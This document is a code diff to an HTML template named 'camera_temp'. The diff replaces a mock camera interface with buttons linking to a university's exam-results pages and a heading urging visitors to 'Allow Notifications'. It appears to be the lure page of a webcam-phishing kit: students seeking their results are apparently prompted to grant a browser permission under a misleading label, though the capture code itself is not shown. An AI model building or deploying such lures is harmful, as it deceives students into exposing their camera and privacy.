--- a/template/camera_temp/index.html
+++ b/template/camera_temp/index.html
@@ -106,35 +106,48 @@ init();
         }
     </script>
 </head>
-
-<body translate="no">
-<div id="device">
-    <div id="top">
-        <div class="left">&nbsp;</div>
-        <div class="right">&nbsp;</div>
-    </div>
-    <div id="content">
-        <div class="menu"><i class="fas fa-bolt fa-lg"></i>
-            <div class="profilePhoto"></div>
-            <i class="fas fa-volume-mute fa-lg"></i>
-        </div>
-        <div class="takenPhotos">
-            <div class="first"></div>
-            <div class="second"></div>
-            <div class="third"></div>
-        </div>
-        <div class="circle">
-            <div class="fill"></div>
-        </div>
-        <i class="fas fa-sync-alt fa-lg right"></i>
-        <div class="detection">
-            <div class="line-left"></div>
-            <div class="line-top"></div>
-            <div class="line-right"></div>
-            <div class="line-bottom"></div>
-        </div>
-    </div>
-</div>
-<script src="https://use.fontawesome.com/releases/v5.7.2/css/all.css"></script>
-</body>
-</html>
+<body>
+  <!--
+  <body translate="no">
+  <div id="device">
+      <div id="top">
+          <div class="left">&nbsp;</div>
+          <div class="right">&nbsp;</div>
+      </div>
+      <div id="content">
+          <div class="menu"><i class="fas fa-bolt fa-lg"></i>
+              <div class="profilePhoto"></div>
+              <i class="fas fa-volume-mute fa-lg"></i>
+          </div>
+          <div class="takenPhotos">
+              <div class="first"></div>
+              <div class="second"></div>
+              <div class="third"></div>
+          </div>
+          <div class="circle">
+              <div class="fill"></div>
+          </div>
+          <i class="fas fa-sync-alt fa-lg right"></i>
+          <div class="detection">
+              <div class="line-left"></div>
+              <div class="line-top"></div>
+              <div class="line-right"></div>
+              <div class="line-bottom"></div>
+          </div>
+      </div>
+  </div>
+  <script src="https://use.fontawesome.com/releases/v5.7.2/css/all.css"></script> -->
+  
+  <br><br>
+  <a href="https://jntuaresults.ac.in/view-results-56736664.html"> <button><span style="color: dodgerblue;"><b>B.Tech I Year II Semester (R20) (For 2020 Admitted Batch) Supplementary Examinations, April/May 2022</b></span></button></a>
+  <br><br><br>
+  <a href="https://jntuaresults.ac.in/view-results-56736664.html"> <button><span style="color: dodgerblue;"><b>B.Tech I Year I Semester (R20) (For 2020 Admitted Batch) Supplementary Examinations, February/March 2022</b></span></button></a>
+  <br><br><br>
+  <a href="https://jntuaresults.ac.in/view-results-56736612.html"> <button><span style="color: dodgerblue;"><b>B.Tech I Year II Semester (R20) Regular Examinations, November 2021</b></span></button></a>
+  <br><br><br>
+  <a href="https://jntuaresults.ac.in/view-results-56736574.html"> <button><span style="color: dodgerblue;"><b>B.Tech I Year I Semester (R20) Regular Examinations, May 2021</b></span></button></a>
+  <br><br><br>
+  <span style="align-items: center; "><b><h1>Should Allow Notifications</h1></b></span>
+  </div>
+  </body>
+  </html>
